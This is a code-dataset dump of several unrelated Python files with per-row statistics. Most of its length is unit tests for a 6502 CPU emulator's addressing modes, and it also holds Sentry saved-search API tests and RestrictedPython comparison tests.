| 44 | 63 | 0.872727 | 28 | 220 | 6.714286 | 0.5 | 0.276596 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 220 | 4 | 64 | 55 | 0.94 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.25 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7a46224293f69ae5223617bb536ce4e3e195bd31 | 31 | py | Python | bumblebee/bees/weibo/__init__.py | nosoyyo/bumblebee | 60452b03b2cd255ae4582a830b463fe7183e209e | [
"Apache-2.0"
] | null | null | null | bumblebee/bees/weibo/__init__.py | nosoyyo/bumblebee | 60452b03b2cd255ae4582a830b463fe7183e209e | [
"Apache-2.0"
] | null | null | null | bumblebee/bees/weibo/__init__.py | nosoyyo/bumblebee | 60452b03b2cd255ae4582a830b463fe7183e209e | [
"Apache-2.0"
] | null | null | null | from .weibobee import WeiboBee
| 15.5 | 30 | 0.83871 | 4 | 31 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7aa3e9a5096c5ddc3c9ace004c03500d96bcecca | 408 | py | Python | tests/transformer/operators/test_comparison_operators.py | rahulbahal7/restricted-python | c39cffe71dfc30630e946977735303d3a65b0383 | [
"ZPL-2.1"
] | 236 | 2015-01-03T17:14:53.000Z | 2022-03-01T15:52:46.000Z | tests/transformer/operators/test_comparison_operators.py | rahulbahal7/restricted-python | c39cffe71dfc30630e946977735303d3a65b0383 | [
"ZPL-2.1"
] | 149 | 2016-10-24T06:56:44.000Z | 2022-02-24T08:09:10.000Z | tests/transformer/operators/test_comparison_operators.py | rahulbahal7/restricted-python | c39cffe71dfc30630e946977735303d3a65b0383 | [
"ZPL-2.1"
] | 30 | 2015-04-03T05:38:13.000Z | 2021-11-10T05:13:38.000Z | from tests.helper import restricted_eval
def test_Eq():
assert restricted_eval('1 == 1') is True
def test_NotEq():
assert restricted_eval('1 != 2') is True
def test_Gt():
assert restricted_eval('2 > 1') is True
def test_Lt():
assert restricted_eval('1 < 2')
def test_GtE():
assert restricted_eval('2 >= 2') is True
def test_LtE():
assert restricted_eval('1 <= 2') is True
| 15.692308 | 44 | 0.659314 | 64 | 408 | 4 | 0.296875 | 0.382813 | 0.46875 | 0.328125 | 0.496094 | 0.21875 | 0.21875 | 0 | 0 | 0 | 0 | 0.037267 | 0.210784 | 408 | 25 | 45 | 16.32 | 0.757764 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0.461538 | 1 | 0.461538 | true | 0 | 0.076923 | 0 | 0.538462 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7aad8df958d81efe593a9b784e5a22aa229d8e5d | 28 | py | Python | rlib/algorithms/vpg/__init__.py | MarcioPorto/rlib | 5919f2dc52105000a23a25c31bbac260ca63565f | [
"MIT"
] | 1 | 2019-09-08T08:33:13.000Z | 2019-09-08T08:33:13.000Z | rlib/algorithms/vpg/__init__.py | MarcioPorto/rlib | 5919f2dc52105000a23a25c31bbac260ca63565f | [
"MIT"
] | 26 | 2019-03-15T03:11:21.000Z | 2022-03-11T23:42:46.000Z | rlib/algorithms/vpg/__init__.py | MarcioPorto/rlib | 5919f2dc52105000a23a25c31bbac260ca63565f | [
"MIT"
] | null | null | null | from .agent import VPGAgent
| 14 | 27 | 0.821429 | 4 | 28 | 5.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 28 | 1 | 28 | 28 | 0.958333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8fbb8025465b4a97be202eba2279336ee52264bd | 133 | py | Python | Dataset/Leetcode/train/104/581.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/train/104/581.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/train/104/581.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | class Solution(object):
def XXX(self, root):
return 0 if not root else max(self.XXX(root.left),self.XXX(root.right))+1
| 26.6 | 82 | 0.661654 | 23 | 133 | 3.826087 | 0.695652 | 0.159091 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018692 | 0.195489 | 133 | 4 | 83 | 33.25 | 0.803738 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
8fd1f45836e437c9643d4ba819ed0b645f0c743e | 99 | py | Python | tests/conftest.py | upymake/pypan | a0bc128780d59a1dfccad82b592a4f31f5d35386 | [
"MIT"
] | 3 | 2020-06-23T21:24:20.000Z | 2020-09-03T02:09:31.000Z | tests/conftest.py | upymake/pypan | a0bc128780d59a1dfccad82b592a4f31f5d35386 | [
"MIT"
] | 18 | 2020-04-26T09:55:14.000Z | 2022-01-19T10:05:00.000Z | tests/conftest.py | vyahello/pypan | a0bc128780d59a1dfccad82b592a4f31f5d35386 | [
"MIT"
] | null | null | null | from _pytest.config.argparsing import Parser
from _pytest.fixtures import SubRequest
import pytest
| 24.75 | 44 | 0.868687 | 13 | 99 | 6.461538 | 0.615385 | 0.238095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10101 | 99 | 3 | 45 | 33 | 0.94382 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8fd2db782e2435e85d39fe95558b66e3169ac206 | 2,303 | py | Python | tests/sentry/api/endpoints/test_project_search_details.py | vperron/sentry | 4ea0c8cb120a3165f0e0b185c64213b69ab621ea | [
"BSD-3-Clause"
] | 20 | 2016-10-01T04:29:24.000Z | 2020-10-09T07:23:34.000Z | tests/sentry/api/endpoints/test_project_search_details.py | tobetterman/sentry | fe85d3aee19dcdbfdd27921c4fb04529fc995a79 | [
"BSD-3-Clause"
] | null | null | null | tests/sentry/api/endpoints/test_project_search_details.py | tobetterman/sentry | fe85d3aee19dcdbfdd27921c4fb04529fc995a79 | [
"BSD-3-Clause"
] | 7 | 2016-10-27T05:12:45.000Z | 2021-05-01T14:29:53.000Z | from __future__ import absolute_import
from django.core.urlresolvers import reverse
from sentry.models import SavedSearch
from sentry.testutils import APITestCase
class ProjectSearchDetailsTest(APITestCase):
def test_simple(self):
self.login_as(user=self.user)
project = self.create_project(name='foo')
search = SavedSearch.objects.create(
project=project,
name='foo',
query='',
)
url = reverse('sentry-api-0-project-search-details', kwargs={
'organization_slug': project.organization.slug,
'project_slug': project.slug,
'search_id': search.id,
})
response = self.client.get(url)
assert response.status_code == 200, response.content
assert response.data['id'] == str(search.id)
class UpdateProjectSearchDetailsTest(APITestCase):
def test_simple(self):
self.login_as(user=self.user)
project = self.create_project(name='foo')
search = SavedSearch.objects.create(
project=project,
name='foo',
query='',
)
url = reverse('sentry-api-0-project-search-details', kwargs={
'organization_slug': project.organization.slug,
'project_slug': project.slug,
'search_id': search.id,
})
response = self.client.put(url, {'name': 'bar'})
assert response.status_code == 200, response.content
assert response.data['id'] == str(search.id)
search = SavedSearch.objects.get(id=search.id)
assert search.name == 'bar'
class DeleteProjectSearchTest(APITestCase):
def test_simple(self):
self.login_as(user=self.user)
project = self.create_project(name='foo')
search = SavedSearch.objects.create(
project=project,
name='foo',
query='',
)
url = reverse('sentry-api-0-project-search-details', kwargs={
'organization_slug': project.organization.slug,
'project_slug': project.slug,
'search_id': search.id,
})
response = self.client.delete(url)
assert response.status_code == 204, response.content
assert not SavedSearch.objects.filter(id=search.id).exists()
| 29.909091 | 69 | 0.613982 | 243 | 2,303 | 5.711934 | 0.230453 | 0.057637 | 0.060519 | 0.051873 | 0.729827 | 0.708213 | 0.708213 | 0.708213 | 0.708213 | 0.708213 | 0 | 0.007117 | 0.267911 | 2,303 | 76 | 70 | 30.302632 | 0.816133 | 0 | 0 | 0.701754 | 0 | 0 | 0.108988 | 0.045593 | 0 | 0 | 0 | 0 | 0.122807 | 1 | 0.052632 | false | 0 | 0.070175 | 0 | 0.175439 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
89003c26224155d30406f5cb927c49bc462a46ef | 142 | py | Python | PyVuka/svd.py | NobregaIPI/pyvuka | 62b0540af8fc0a556fa9f5b2338f81b74dac1902 | [
"Unlicense"
] | null | null | null | PyVuka/svd.py | NobregaIPI/pyvuka | 62b0540af8fc0a556fa9f5b2338f81b74dac1902 | [
"Unlicense"
] | null | null | null | PyVuka/svd.py | NobregaIPI/pyvuka | 62b0540af8fc0a556fa9f5b2338f81b74dac1902 | [
"Unlicense"
] | 2 | 2020-02-07T18:51:42.000Z | 2021-07-07T15:51:21.000Z | from numpy.linalg.linalg import svd as npsvd
def svd():
"""Perform a singular value decomposition."""
print("SVD not implemented")
| 17.75 | 49 | 0.697183 | 19 | 142 | 5.210526 | 0.842105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190141 | 142 | 7 | 50 | 20.285714 | 0.86087 | 0.274648 | 0 | 0 | 0 | 0 | 0.197917 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
890a2edb0b1a27198f200280cf2922c2c606e2a7 | 22,049 | py | Python | tests/test_bitey_cpu_addressing_mode.py | jgerrish/bitey | a393a83c19338d94116f3405f4b8a0f03ea84d79 | [
"MIT"
] | null | null | null | tests/test_bitey_cpu_addressing_mode.py | jgerrish/bitey | a393a83c19338d94116f3405f4b8a0f03ea84d79 | [
"MIT"
] | null | null | null | tests/test_bitey_cpu_addressing_mode.py | jgerrish/bitey | a393a83c19338d94116f3405f4b8a0f03ea84d79 | [
"MIT"
] | null | null | null | import pytest
from bitey.cpu.addressing_mode import (
AbsoluteAddressingMode,
AbsoluteIndirectAddressingMode,
AbsoluteIndirectPageBoundaryBugAddressingMode,
AbsoluteXAddressingMode,
AbsoluteYAddressingMode,
AccumulatorAddressingMode,
ImpliedAddressingMode,
IndexedIndirectAddressingMode,
IndirectIndexedAddressingMode,
ZeroPageAddressingMode,
ZeroPageXAddressingMode,
ZeroPageYAddressingMode,
RelativeAddressingMode,
)
from bitey.computer.computer import Computer
def build_computer():
with open("chip/6502.json") as f:
chip_data = f.read()
computer = Computer.build_from_json(chip_data)
assert len(computer.memory.memory) == 65536
return computer
return None
# module scope means run once per test module
@pytest.fixture(scope="module")
def setup():
computer = build_computer()
yield computer
def test_cpu_addressing_mode_implied_get_value():
iam = ImpliedAddressingMode()
assert type(iam) == ImpliedAddressingMode
assert iam.get_value(None, None, None) == (None, None)
def test_cpu_addressing_mode_absolute_get_value(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0x20)
computer.memory.write(0x2010, 0x33)
computer.cpu.registers["PC"].set(0x0B)
aam = AbsoluteAddressingMode()
assert type(aam) == AbsoluteAddressingMode
value = aam.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
assert aam.adl == 0x10
assert aam.adh == 0x20
assert value == (0x2010, 0x33)
assert computer.cpu.registers["PC"].get() == 0x0D
def test_cpu_addressing_mode_absolute_indirect_get_value(setup):
computer = setup
computer.reset()
# Pointer to the pointer to the effective address
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0x20)
# Pointer to the effective address
computer.memory.write(0x2010, 0x33)
computer.memory.write(0x2011, 0x55)
computer.memory.write(0x5533, 0x11)
computer.cpu.registers["PC"].set(0x0B)
aam = AbsoluteIndirectAddressingMode()
assert type(aam) == AbsoluteIndirectAddressingMode
value = aam.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
# adl and adh are the effective address low and high bytes
# not the original address (PC + 1, PC + 2)
assert aam.adl == 0x33
assert aam.adh == 0x55
assert value == (0x5533, 0x11)
assert computer.cpu.registers["PC"].get() == 0x0D
def test_cpu_addressing_mode_immediate_get_value(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x10, 0x33)
computer.cpu.registers["PC"].set(0x0B)
zpam = ZeroPageAddressingMode()
assert type(zpam) == ZeroPageAddressingMode
value = zpam.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
assert value == (0x10, 0x33)
assert computer.cpu.registers["PC"].value == 0x0C
def test_cpu_addressing_mode_zeropagex_get_value(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x10, 0x33)
computer.memory.write(0x51, 0xC1)
computer.cpu.registers["PC"].set(0x0B)
# set the X register
computer.cpu.registers["X"].set(0x41)
zpxam = ZeroPageXAddressingMode()
assert type(zpxam) == ZeroPageXAddressingMode
(address, value) = zpxam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert address == 0x51
assert value == 0xC1
assert computer.cpu.registers["PC"].get() == 0x0C
def test_cpu_addressing_mode_zeropagex_get_value_wrap(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x10, 0x33)
computer.memory.write(0x05, 0xC1)
computer.cpu.registers["PC"].set(0x0B)
# set the X register
computer.cpu.registers["X"].set(0xF5)
zpxam = ZeroPageXAddressingMode()
assert type(zpxam) == ZeroPageXAddressingMode
(address, value) = zpxam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert address == 0x05
assert value == 0xC1
assert computer.cpu.registers["PC"].value == 0x0C
def test_cpu_addressing_mode_zeropagex_get_value_wrap_on_255(setup):
"Test wrapping exactly on a value of 0xFF"
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x10, 0x33)
computer.memory.write(0x06, 0xC1)
computer.memory.write(0xFF, 0xFD)
computer.cpu.registers["PC"].set(0x0B)
# set the X register
computer.cpu.registers["X"].set(0xEF)
# The sum should be 0xFF
zpxam = ZeroPageXAddressingMode()
assert type(zpxam) == ZeroPageXAddressingMode
(address, value) = zpxam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert address == 0xFF
assert value == 0xFD
assert computer.cpu.registers["PC"].value == 0x0C
def test_cpu_addressing_mode_zeropagey_get_value(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x10, 0x33)
computer.memory.write(0x51, 0xC1)
computer.cpu.registers["PC"].set(0x0B)
# set the Y register
computer.cpu.registers["Y"].set(0x41)
zpyam = ZeroPageYAddressingMode()
assert type(zpyam) == ZeroPageYAddressingMode
(address, value) = zpyam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert address == 0x51
assert value == 0xC1
assert computer.cpu.registers["PC"].value == 0x0C
def test_cpu_addressing_mode_zeropagey_get_value_wrap(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x10, 0x33)
computer.memory.write(0x05, 0xC1)
computer.cpu.registers["PC"].set(0x0B)
# set the Y register
computer.cpu.registers["Y"].set(0xF5)
zpyam = ZeroPageYAddressingMode()
assert type(zpyam) == ZeroPageYAddressingMode
(address, value) = zpyam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert address == 0x05
assert value == 0xC1
assert computer.cpu.registers["PC"].value == 0x0C
def test_cpu_addressing_mode_zeropagey_get_value_nowrap_ff(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x10, 0x33)
computer.memory.write(0xFF, 0xC1)
computer.cpu.registers["PC"].set(0x0B)
# set the Y register
computer.cpu.registers["Y"].set(0xEF)
zpyam = ZeroPageYAddressingMode()
assert type(zpyam) == ZeroPageYAddressingMode
(address, value) = zpyam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert address == 0xFF
assert value == 0xC1
assert computer.cpu.registers["PC"].value == 0x0C
def test_cpu_addressing_mode_relative_get_value(setup):
computer = setup
computer.reset()
computer.memory.write(0xA0, 0x10)
computer.memory.write(0x00B1, 0x12)
computer.cpu.registers["PC"].set(0xA0)
rel = RelativeAddressingMode()
assert type(rel) == RelativeAddressingMode
(addr, value) = rel.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert addr == 0x00B1
assert value == 0x12
def test_cpu_addressing_mode_relative_get_value_negative(setup):
computer = setup
computer.reset()
computer.memory.write(0x0070, 0xB0)
computer.memory.write(0x0021, 0x1A)
computer.cpu.registers["PC"].set(0x70)
rel = RelativeAddressingMode()
assert type(rel) == RelativeAddressingMode
(addr, value) = rel.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert addr == 0x0021
assert value == 0x1A
def test_cpu_addressing_mode_relative_get_value_negative_lt_zero(setup):
computer = setup
computer.reset()
computer.memory.write(0x0020, 0xB0)
computer.memory.write(0xFFD1, 0x15)
computer.cpu.registers["PC"].set(0x20)
rel = RelativeAddressingMode()
assert type(rel) == RelativeAddressingMode
(addr, value) = rel.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert addr == 0xFFD1
assert value == 0x15
def test_cpu_addressing_mode_relative_get_value_negative_page_crossing(setup):
computer = setup
computer.reset()
computer.memory.write(0x70, 0xB0)
computer.memory.write(0x0021, 0x08)
computer.cpu.registers["PC"].set(0x70)
rel = RelativeAddressingMode()
assert type(rel) == RelativeAddressingMode
(addr, value) = rel.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert addr == 0x0021
assert value == 0x08
def test_cpu_addressing_mode_relative_get_value_page_crossing(setup):
computer = setup
computer.reset()
computer.memory.write(0xA0, 0x60)
computer.memory.write(0x0101, 0xD1)
computer.cpu.registers["PC"].set(0xA0)
rel = RelativeAddressingMode()
assert type(rel) == RelativeAddressingMode
(addr, value) = rel.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert addr == 0x0101
assert value == 0xD1
def test_cpu_addressing_mode_relative_get_value_gt_16_bit(setup):
computer = setup
computer.reset()
computer.memory.write(0xFFC0, 0x60)
computer.memory.write(0x0021, 0x10)
computer.cpu.registers["PC"].set(0xFFC0)
rel = RelativeAddressingMode()
assert type(rel) == RelativeAddressingMode
(addr, value) = rel.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert addr == 0x0021
assert value == 0x0010
def test_cpu_addressing_mode_relative_get_value_lt_zero(setup):
computer = setup
computer.reset()
computer.memory.write(0x0003, 0x80)
computer.memory.write(0xFF84, 0xF3)
computer.cpu.registers["PC"].set(0x0003)
rel = RelativeAddressingMode()
assert type(rel) == RelativeAddressingMode
(addr, value) = rel.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert addr == 0xFF84
assert value == 0xF3
def test_cpu_addressing_mode_indirect_indexed(setup):
computer = setup
computer.reset()
# Zero Page ADL
computer.memory.write(0x10, 0x70)
# Zero Page ADH
computer.memory.write(0x11, 0x0B)
# Final address
computer.memory.write(0x0B75, 0x73)
computer.cpu.registers["PC"].set(0x10)
computer.cpu.registers["Y"].set(0x05)
am = IndirectIndexedAddressingMode()
assert type(am) == IndirectIndexedAddressingMode
value = am.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
assert value == (0xB75, 0x73)
def test_cpu_addressing_mode_indirect_indexed_page_rollover(setup):
computer = setup
computer.reset()
# Zero Page ADL
computer.memory.write(0x10, 0x70)
# Zero Page ADH
computer.memory.write(0x11, 0xFF)
# Final address
computer.memory.write(0x0009, 0x73)
computer.cpu.registers["PC"].set(0x10)
computer.cpu.registers["Y"].set(0x99)
am = IndirectIndexedAddressingMode()
assert type(am) == IndirectIndexedAddressingMode
(address, value) = am.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert address == 0x09
assert value == 0x73
def test_cpu_addressing_mode_indirect_indexed_page_norollover_ffff(setup):
computer = setup
computer.reset()
# Zero Page ADL
computer.memory.write(0x10, 0x70)
# Zero Page ADH
computer.memory.write(0x11, 0xFF)
# Final address
computer.memory.write(0xFFFF, 0x73)
computer.cpu.registers["PC"].set(0x10)
computer.cpu.registers["Y"].set(0x8F)
am = IndirectIndexedAddressingMode()
assert type(am) == IndirectIndexedAddressingMode
(address, value) = am.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert address == 0xFFFF
assert value == 0x73
def test_cpu_addressing_mode_indexed_indirect(setup):
computer = setup
computer.reset()
# Zero Page ADL
computer.memory.write(0x14, 0x70)
# Zero Page ADH
computer.memory.write(0x15, 0x0B)
# Final address
computer.memory.write(0x0B70, 0x73)
computer.cpu.registers["PC"].set(0x10)
computer.cpu.registers["X"].set(0x04)
am = IndexedIndirectAddressingMode()
assert type(am) == IndexedIndirectAddressingMode
value = am.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
assert value == (0x0B70, 0x73)
def test_cpu_addressing_mode_indexed_indirect_incorrect_wrap(setup):
"Test for bug with incorrect wrap case"
computer = setup
computer.reset()
# Zero Page ADL
computer.memory.write(0xFF, 0x70)
# Zero Page ADH
computer.memory.write(0x00, 0x0B)
# Final address
computer.memory.write(0x0B70, 0x73)
computer.cpu.registers["PC"].set(0xFB)
computer.cpu.registers["X"].set(0x04)
am = IndexedIndirectAddressingMode()
assert type(am) == IndexedIndirectAddressingMode
value = am.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
assert value == (0x0B70, 0x73)
def test_cpu_addressing_mode_absolute_x(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0x20)
computer.memory.write(0x2015, 0x33)
computer.cpu.registers["PC"].set(0x0B)
computer.cpu.registers["X"].set(0x05)
axam = AbsoluteXAddressingMode()
assert type(axam) == AbsoluteXAddressingMode
value = axam.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
assert axam.adl == 0x10
assert axam.adh == 0x20
assert value == (0x2015, 0x33)
assert computer.cpu.registers["PC"].value == 13
def test_cpu_addressing_mode_absolute_x_page_crossing(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0x20)
computer.memory.write(0x2105, 0x33)
computer.cpu.registers["PC"].set(0x0B)
computer.cpu.registers["X"].set(0xF5)
axam = AbsoluteXAddressingMode()
assert type(axam) == AbsoluteXAddressingMode
value = axam.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
assert axam.adl == 0x10
assert axam.adh == 0x20
assert value == (0x2105, 0x33)
assert computer.cpu.registers["PC"].get() == 0x0D
def test_cpu_addressing_mode_absolute_x_eom_wrap(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0xFF)
computer.memory.write(0x0005, 0x33)
computer.cpu.registers["PC"].set(0x0B)
computer.cpu.registers["X"].set(0xF5)
axam = AbsoluteXAddressingMode()
assert type(axam) == AbsoluteXAddressingMode
(address, value) = axam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert axam.adl == 0x10
assert axam.adh == 0xFF
assert address == 0x05
assert value == 0x33
assert computer.cpu.registers["PC"].get() == 0x0D
def test_cpu_addressing_mode_absolute_x_eom_nowrap_ffff(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0xFF)
computer.memory.write(0x0006, 0x33)
computer.memory.write(0xFFFF, 0xC4)
computer.cpu.registers["PC"].set(0x0B)
computer.cpu.registers["X"].set(0xEF)
axam = AbsoluteXAddressingMode()
assert type(axam) == AbsoluteXAddressingMode
(address, value) = axam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert axam.adl == 0x10
assert axam.adh == 0xFF
assert address == 0xFFFF
assert value == 0xC4
assert computer.cpu.registers["PC"].get() == 0x0D
def test_cpu_addressing_mode_absolute_y(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0x20)
computer.memory.write(0x2023, 0x33)
computer.cpu.registers["PC"].set(0x0B)
computer.cpu.registers["Y"].set(0x13)
ayam = AbsoluteYAddressingMode()
assert type(ayam) == AbsoluteYAddressingMode
(address, value) = ayam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert ayam.adl == 0x10
assert ayam.adh == 0x20
assert value == 0x33
assert address == 0x2023
assert computer.cpu.registers["PC"].get() == 0x0D
def test_cpu_addressing_mode_absolute_y_page_crossing(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0x20)
computer.memory.write(0x2105, 0x33)
computer.cpu.registers["PC"].set(0x0B)
computer.cpu.registers["Y"].set(0xF5)
ayam = AbsoluteYAddressingMode()
assert type(ayam) == AbsoluteYAddressingMode
(address, value) = ayam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert ayam.adl == 0x10
assert ayam.adh == 0x20
assert address == 0x2105
assert value == 0x33
assert computer.cpu.registers["PC"].value == 0x0D
def test_cpu_addressing_mode_absolute_y_eom_wrap(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0xFF)
computer.memory.write(0x0005, 0x33)
computer.cpu.registers["PC"].set(0x0B)
computer.cpu.registers["Y"].set(0xF5)
ayam = AbsoluteYAddressingMode()
assert type(ayam) == AbsoluteYAddressingMode
(address, value) = ayam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert ayam.adl == 0x10
assert ayam.adh == 0xFF
assert address == 0x0005
assert value == 0x33
assert computer.cpu.registers["PC"].value == 0x0D
def test_cpu_addressing_mode_absolute_y_eom_nowrap_ffff(setup):
computer = setup
computer.reset()
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0xFF)
computer.memory.write(0xFFFF, 0x33)
computer.cpu.registers["PC"].set(0x0B)
computer.cpu.registers["Y"].set(0xEF)
ayam = AbsoluteYAddressingMode()
assert type(ayam) == AbsoluteYAddressingMode
(address, value) = ayam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert ayam.adl == 0x10
assert ayam.adh == 0xFF
assert value == 0x33
assert address == 0xFFFF
assert computer.cpu.registers["PC"].value == 0x0D
def test_cpu_addressing_mode_absolute_indirect_get_instr_str(setup):
computer = setup
computer.reset()
# Pointer to the address containing the effective address
computer.memory.write(0x01, 0xA0)
computer.memory.write(0x02, 0x00)
# The pointer to the effective address
computer.memory.write(0xA0, 0x05)
computer.memory.write(0xA1, 0x00)
computer.cpu.registers["PC"].set(0x01)
aiam = AbsoluteIndirectAddressingMode()
inst_str = aiam.get_inst_str(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert inst_str == "($0005)"
def test_cpu_addressing_mode_accumulator(setup):
"Test accumulator addressing mode"
computer = setup
computer.reset()
